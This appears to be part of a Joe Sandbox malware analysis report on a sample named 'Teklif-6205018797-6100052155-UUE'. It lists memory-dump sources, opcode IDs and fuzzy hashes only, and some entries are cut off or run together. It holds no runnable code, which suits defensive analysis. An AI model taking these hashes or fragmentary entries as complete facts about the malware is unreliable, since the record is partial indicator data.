                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25d5dfc353c144e4ac3341eab88c9a48dd770ce83b17674a0ede211e7ae58425
                                                          • Instruction ID: 62fa34d37b42368e3391574ce445e164ad0312b786a7d5c7a789d979ccff4ca1
                                                          • Opcode Fuzzy Hash: 25d5dfc353c144e4ac3341eab88c9a48dd770ce83b17674a0ede211e7ae58425
                                                          • Instruction Fuzzy Hash: 3DA1E270D05218CFDB64DFA8D884B9DBBF6FB49308F2484AAE409A7354DB745989CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00556f786a8c6bcffec05b0537f996eec9dfc40fb77c4914b9971279f6583e9d
                                                          • Instruction ID: 726e6be527d2d1841173c8182a919ead276a9d83a92dff6d62583d7a235f608e
                                                          • Opcode Fuzzy Hash: 00556f786a8c6bcffec05b0537f996eec9dfc40fb77c4914b9971279f6583e9d
                                                          • Instruction Fuzzy Hash: EC810575A00218DFCB14DF68C58499EBBFAFF88310B1585A9E816DB360DB31ED42CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9369e7fbda35e67311509a5e09f7a51cca71264115992945a6a472fb4d5fb308
                                                          • Instruction ID: ed68c90564fd3d59f103cc38335dab0e4b1d275006ba808fb97bd250fe7ce545
                                                          • Opcode Fuzzy Hash: 9369e7fbda35e67311509a5e09f7a51cca71264115992945a6a472fb4d5fb308
                                                          • Instruction Fuzzy Hash: B781F274E01258CFDB54DFA8C544BADBBF2FB49305F2494AAD00AAB255CB345E89CF12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28081405351d9a2a6971adf6f5bdf5290b8f7bf462b0341271de6e9798079a0d
                                                          • Instruction ID: ed5253ff82838b0e43d704a81e98763571f82dae4002474c50c7c698889c332c
                                                          • API String ID:
                                                          • Opcode ID: e1f6b424ce4babd08ba210d18dd721447421a3a89a4f848d7b0b2742e57823e1
                                                          • Instruction ID: 4646f065ad74d1ff5bda244831c0cd5438dc4a1cc33831aff9a9867deea72f54
                                                          • Opcode Fuzzy Hash: e1f6b424ce4babd08ba210d18dd721447421a3a89a4f848d7b0b2742e57823e1
                                                          • Instruction Fuzzy Hash: 1D419C75A00216CFCB14CFA5C846ABEBBF6FF88704F048429D906EB261D738D945DB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 075f04f9e846d71fc4f5a68bb110e4f6f178e5ab8ab52a015d5d619bbc9eb61b
                                                          • Instruction ID: 4cfd10f53d7be299eebf1ac9b28dd22d8353ded15366c3ab70af7a7337425532
                                                          • Opcode Fuzzy Hash: 075f04f9e846d71fc4f5a68bb110e4f6f178e5ab8ab52a015d5d619bbc9eb61b
                                                          • Instruction Fuzzy Hash: DB311A35A00119DBDB04DFA4D955AEEB7BAFF88310F148025E802BB3A4DB75AD15CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 533ca0397631ae0e17f9405ef4acd693eb911df27c223cef160f584c170e733b
                                                          • Instruction ID: 40c9fd48a72911562313878f1ce470bef25e5d031d5b3784631ca71503bec3bc
                                                          • Opcode Fuzzy Hash: 533ca0397631ae0e17f9405ef4acd693eb911df27c223cef160f584c170e733b
                                                          • Instruction Fuzzy Hash: 2841D779A41228CFEB24DB64CD91FA9B7B1BB58310F1141D5EA05AB3A1D631ED81CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 98c28ac4fdf3fc2b3dd15e82faf07dc95bfd6be01bb3e2655553cdff75aabf3d
                                                          • Instruction ID: e51319c21485a4b7b6bbc3d321f9ea468d2de9c7b968e710a6f7df03f63f7e5a
                                                          • Opcode Fuzzy Hash: 98c28ac4fdf3fc2b3dd15e82faf07dc95bfd6be01bb3e2655553cdff75aabf3d
                                                          • Instruction Fuzzy Hash: 23310270E06209CFDB04DFA9D444AEEBBF2BB89320F14C169EC19A7251D7749A46CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6761f7149b2bcf5b568292f797594d0f860a06f7884ef008d2dc384c40de5f4
                                                          • Instruction ID: 6f2d7bf3145b12fbe03fa469ab07f8761f7e80e7fb5bd3ac738213bce81d3b3d
                                                          • Opcode Fuzzy Hash: d6761f7149b2bcf5b568292f797594d0f860a06f7884ef008d2dc384c40de5f4
                                                          • Instruction Fuzzy Hash: 83314674E012099FCB09DFA9E8559EEBBF6FF88310F10846AE806A7365DB315901CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e9a5dbd66cf5b3208c5ed1520bde68d01da4063d5b162adc0745d431f90d10b
                                                          • Instruction ID: 69ea911362b8467b2b692da68582396e9d3f5638ecbe0e51ff4f301022de4160
                                                          • Opcode Fuzzy Hash: 0e9a5dbd66cf5b3208c5ed1520bde68d01da4063d5b162adc0745d431f90d10b
                                                          • Instruction Fuzzy Hash: 1E2192323456009FD724DB6DE885A6ABBEAEFC0325B1A847AE14EC7251DB35EC41C750
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80f7123d6bd323cb39106678a9194542376f49a09e3c5fef598c5816dff54053
                                                          • Instruction ID: 62cf143486cd22d4e07f9ac672fb85c9fe1e1285cb49064e2e22c182a6e9e815
                                                          • Opcode Fuzzy Hash: 80f7123d6bd323cb39106678a9194542376f49a09e3c5fef598c5816dff54053
                                                          • Instruction Fuzzy Hash: D831E270906218CFDB14DFA9C844BADBBF2BB4A319F1480A5EC09E7255D774AE86CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9fdd9024d29d0dd1509a800ab3ee13402556d5632dd281b63ea9f606df47e478
                                                          • Instruction ID: 0b2df7ab0e6b36b12e950f86f7a0ddd1fad362fe22ee97b869039677fce8309e
                                                          • Opcode Fuzzy Hash: 9fdd9024d29d0dd1509a800ab3ee13402556d5632dd281b63ea9f606df47e478
                                                          • Instruction Fuzzy Hash: 3E311374E04208CFCB44DFA9D8446AEBBFAFB89314F14C4A9D816A7344EB349A45CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 965a1050fc38b51b5d863d0634a2625a90227ee8b6abb52613ac481b172d2995
                                                          • Instruction ID: 6d8ee918b62113ba68ba08c86f9a53439bca92639db10dd4b60e98710fabae54
                                                          • Opcode Fuzzy Hash: 965a1050fc38b51b5d863d0634a2625a90227ee8b6abb52613ac481b172d2995
                                                          • Instruction Fuzzy Hash: 46316D35200204EFDF15CF19D98AEAA3BBAFF48305F1481A9F9058B2A1CB75DC95CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be63719f042476409b78c26b8a7b99a6edc8b7a1406483d64d4a79f28bc82d73
                                                          • Instruction ID: 02f0f386dc8c343aeb3bc0b8d72ca5062c8e2ad5076ffb8cd8d07022613ae4f9
                                                          • Opcode Fuzzy Hash: be63719f042476409b78c26b8a7b99a6edc8b7a1406483d64d4a79f28bc82d73
                                                          • Instruction Fuzzy Hash: B5214474B10A09CFCB00EFA8D5559AEF7B6FFC9700B10416AD506A7360EF74AA46CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a2e553fd6191f8767f822d4659cb307e16cd65560a65234345d7563dddaa806
                                                          • Instruction ID: 7aaac049d5fdb1e33ccf94cb613b9485ab28ed3950ee42e0eba800bcaab332e6
                                                          • Opcode Fuzzy Hash: 8a2e553fd6191f8767f822d4659cb307e16cd65560a65234345d7563dddaa806
                                                          • Instruction Fuzzy Hash: 05215374B00609CFCB01EF68D455AAEBBB6EF89700F10426AD506EB360DB74A906CBD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba8495cbbd18a10841afdaea08bb69ab1e9e399d2add956094cbe2bb79195fc0
                                                          • Instruction ID: 3403fe698fce557b59012855f9c0a968bd35e17f63573d1ea832261cf0e7ef79
                                                          • Opcode Fuzzy Hash: ba8495cbbd18a10841afdaea08bb69ab1e9e399d2add956094cbe2bb79195fc0
                                                          • Instruction Fuzzy Hash: 94217F71E40209DFEB10DFB8C505BAEBBF9AF04340F108866D51AD7290E738CA45CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f750198949c70e62779c1366cb1309addca92fbccb8a4933eb21bd6409814dcc
                                                          • Instruction ID: 068a170f599f0e97ba27fed14a51b23dbd769ca676d93285d961907ff65d1742
                                                          • Opcode Fuzzy Hash: f750198949c70e62779c1366cb1309addca92fbccb8a4933eb21bd6409814dcc
                                                          • Instruction Fuzzy Hash: AE21F5B4D06209DFDB48EFAAD8047EEBBF2FB88300F109429D515A3341DB7949468F96
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206103165.00000000006BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6bd000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9064e748f145053e3944b6f641397484f49f46209d6914bb6631a30b6b7e2712
                                                          • Instruction ID: 1572d5dc7664d9055531e4f8f9c314e6b419b2a53fe816214da413dd35eaa525
                                                          • Opcode Fuzzy Hash: 9064e748f145053e3944b6f641397484f49f46209d6914bb6631a30b6b7e2712
                                                          • Instruction Fuzzy Hash: A421FFB15042049FCB15EF18D984BA6BF66EB88314F20C569E9090E246D33AD897DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be5212ffcb714549e4601cccd4cf7dfa4cf950a27e36d99445424010ccb213e5
                                                          • Instruction ID: ce96e67a2a588c5c49921fc239539ca2099ef46dde37e1a9231b48fa0cab4346
                                                          • Opcode Fuzzy Hash: be5212ffcb714549e4601cccd4cf7dfa4cf950a27e36d99445424010ccb213e5
                                                          • Instruction Fuzzy Hash: 2D216A326001589FCF05DE69C849AEA7BEAFF88251F058166F905DB2A0D735EC61CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58ca95d7dff3afd56611a27959adc110a3552c776453c780183697d7554f2a23
                                                          • Instruction ID: 5d6826c423e139db73a2936911bce30b82c46b10d33303cd2907d3bc12243c10
                                                          • Opcode Fuzzy Hash: 58ca95d7dff3afd56611a27959adc110a3552c776453c780183697d7554f2a23
                                                          • Instruction Fuzzy Hash: 2F215170905508DFDB00EFA8E4487AEBFF1FB59309F1086A6D505A3251D77C4989DF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206103165.00000000006BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6bd000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77d9a9f801a7371486d6f466507a39cf47409116b24e1f78481b5a3b96fbc599
                                                          • Instruction ID: f0aeb5adab84160ae52be9c2da24129ad9c811205ad8f6b66aa2fda0672f0b54
                                                          • Opcode Fuzzy Hash: 77d9a9f801a7371486d6f466507a39cf47409116b24e1f78481b5a3b96fbc599
                                                          • Instruction Fuzzy Hash: 08217C7140D3C08FCB03DF24D990755BF72AB46210F2981DBD8858F2A7C33A985ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9837024c9e2f2e05a17a5153d9c6bd83279036b1621de47fb86d36a10441edb
                                                          • Instruction ID: bb35a9965169df5931969873382cbc48ab14c19adf714ca54b77a25eb7b0be42
                                                          • Opcode Fuzzy Hash: e9837024c9e2f2e05a17a5153d9c6bd83279036b1621de47fb86d36a10441edb
                                                          • Instruction Fuzzy Hash: 62210475A00209CFCB18DF98D545EDDB7F2FF88311F2041A4E405AB2A1CB36AE44CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab1b44c4e910ae979200ef68cf793782bf446ecbe6fd31765ca9f9495efb8b6c
                                                          • Instruction ID: da785cd6dd52813024e016449776be0be4580d9ccfcad6b526844263fcef3552
                                                          • Opcode Fuzzy Hash: ab1b44c4e910ae979200ef68cf793782bf446ecbe6fd31765ca9f9495efb8b6c
                                                          • Instruction Fuzzy Hash: EE21F5B0E042099FCB04DFAAD4446AEBBB2FB88310F9485A9DC05A7251E7359E81CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0a04b94706ea4079a43c5d44dc0596a365617325adeac69ad4c95fb90ce9c27
                                                          • Instruction ID: 6ab722f392b331c9b5d4639bfdf21b0d72717663a2a72024869053ecd3b12072
                                                          • Opcode Fuzzy Hash: d0a04b94706ea4079a43c5d44dc0596a365617325adeac69ad4c95fb90ce9c27
                                                          • Instruction Fuzzy Hash: 99211575A40209CFDB18DF94C586ADDB7F2FF88300F2045A4E405BB2A5DB359E45CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c56fb86d5ddac6360b4e15c24370b110eeb515a9952fb49e06742e87fae05e68
                                                          • Instruction ID: 03f172a32620aea811165b66e3339369fb1c544f1b13dbd7b3928f0024077527
                                                          • Opcode Fuzzy Hash: c56fb86d5ddac6360b4e15c24370b110eeb515a9952fb49e06742e87fae05e68
                                                          • Instruction Fuzzy Hash: 4721F035A0021A9FCF14CBE4E950BEEBBB1EF89311F2484A6D406AB381CA359D02CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b7894a05599c14f68ef6303e9bdbaf8231062ba5448c09ab062612009efb88a
                                                          • Instruction ID: 00544aa5c41f24f75f93812570da1355ea5efce1ca8924d7508dbd13eb8ee6c9
                                                          • Opcode Fuzzy Hash: 6b7894a05599c14f68ef6303e9bdbaf8231062ba5448c09ab062612009efb88a
                                                          • Instruction Fuzzy Hash: 3911F8749001288FDB94EF24D854BD9BBF2EB49304F2086E9940AA7345DB755EC5CF94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d06c08f60cef2786fe28e93eeabce041f6ca76d07bb97515bac57fd9830c5fe9
                                                          • Instruction ID: 08c129b2036cdc7b6d6765495f6f08a57833e54a70ec4ae5931d174827c0b03e
                                                          • Opcode Fuzzy Hash: d06c08f60cef2786fe28e93eeabce041f6ca76d07bb97515bac57fd9830c5fe9
                                                          • Instruction Fuzzy Hash: 78016939300610DFC708AB24D419D2ABBA2EFCCB11B108528E90A8B354CF75EC42CBE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ba8250a179e56be466aadc898689fe94cd11702cb98b342ef53e53630699b92
                                                          • Instruction ID: 91b685251700a6351ca18747de9ecf0638536f3bb4bcd2cbb349bbf206ec83c3
                                                          • Opcode Fuzzy Hash: 2ba8250a179e56be466aadc898689fe94cd11702cb98b342ef53e53630699b92
                                                          • Instruction Fuzzy Hash: 2AF0E57630A222C7DB20160E7C81B6E87AEF7C0664F94053AF944D7300D5158C0307D0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32729fe322804216425f23ebf90d26c140395b9d46b506539d2247b3e33bd861
                                                          • Instruction ID: 1c9314e14f4e1de71d507aecada6853259c1910c51bdba6755abea1b3fa8ab88
                                                          • Opcode Fuzzy Hash: 32729fe322804216425f23ebf90d26c140395b9d46b506539d2247b3e33bd861
                                                          • Instruction Fuzzy Hash: 5DF0E931B442116FE3149A5DA800B3BF7EAEBC9720F14482DD5459B350DB75AC4187D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4080f24b9dae6013e73a1db8c89ab0401e670568ff705daacb3a0cf03d065b9
                                                          • Instruction ID: c1442ee61934c8b81a6bbf805b0f8a4b13c2345ecabbc00dbf3e115319d032b2
                                                          • Opcode Fuzzy Hash: b4080f24b9dae6013e73a1db8c89ab0401e670568ff705daacb3a0cf03d065b9
                                                          • Instruction Fuzzy Hash: 9FF0C2B4A08248AFCB42DFA8D8406ACBFF5EB09310F14C1DAEC58D7241D6358E02DF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 714883a79de5394a800f5098f95f49f8c3cc4058747bf3d154887c42343a3ae3
                                                          • Instruction ID: c026d6a526fcda31a31d884bfe62dbc174c35c0fb70786108bd40b694392fd1c
                                                          • Opcode Fuzzy Hash: 714883a79de5394a800f5098f95f49f8c3cc4058747bf3d154887c42343a3ae3
                                                          • Instruction Fuzzy Hash: 9A115D74A052698FDB64CF18D988BD8BBB2FB05304F1095E6E90AB6250DBB15AC8CF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1464ffaf85ef7141c31881d2beed74c108173c6b82c9b215502d3a7b5ac2acdb
                                                          • Instruction ID: e04f831b7bcb3889638ca050beaecba40353d1064448e661186f31cce4da9037
                                                          • Opcode Fuzzy Hash: 1464ffaf85ef7141c31881d2beed74c108173c6b82c9b215502d3a7b5ac2acdb
                                                          • Instruction Fuzzy Hash: DF014B3190465AABCF119FA9C8009EEBB71FF89310F04D619E99823252D732A566DF90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b424b257a1bc8eab22aa54a945fab566556da72119ee6471bbd2f1e67f9c93a4
                                                          • Instruction ID: 57184c7d6242487db9c0659d3caefa64c4673f7ae37a41bbe50b99bb4901b543
                                                          • Opcode Fuzzy Hash: b424b257a1bc8eab22aa54a945fab566556da72119ee6471bbd2f1e67f9c93a4
                                                          • Instruction Fuzzy Hash: 0DF0907A3402009FD705DF24C855F6AB7A6EFC8711F1488AAF94ACB7A1CA35DC42CB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e18a9ab8c12e61d81527b718d4e4af11a10d8deb9f3efa7820db62a1f5bee3a
                                                          • Instruction ID: 349aa0f9dde1ed5315fc890b297e06541044b44ed526947bdac480813ebaa682
                                                          • Opcode Fuzzy Hash: 9e18a9ab8c12e61d81527b718d4e4af11a10d8deb9f3efa7820db62a1f5bee3a
                                                          • Instruction Fuzzy Hash: 9EF027A570F222CBDB2207281C9263D6AEAFBC6540F8404BEF482CB361D908CC438780
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2880ef9197a4d683f9de52e9fd5579bd20f687db34dcba058e2460ab9a0860b4
                                                          • Instruction ID: 4d2084d151c2a22ce70131eecb465901496ce559971a6d0febda0b4102bb3917
                                                          • Opcode Fuzzy Hash: 2880ef9197a4d683f9de52e9fd5579bd20f687db34dcba058e2460ab9a0860b4
                                                          • Instruction Fuzzy Hash: 5A018170A0425A9FDB15CBB4D510BEE7BF26F49340F64446AC042BB2D1DB3A4D01DB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c29357a31967aab49f4602af9a075c5fb7e7eee71c039088c8f6e3559adeb7e
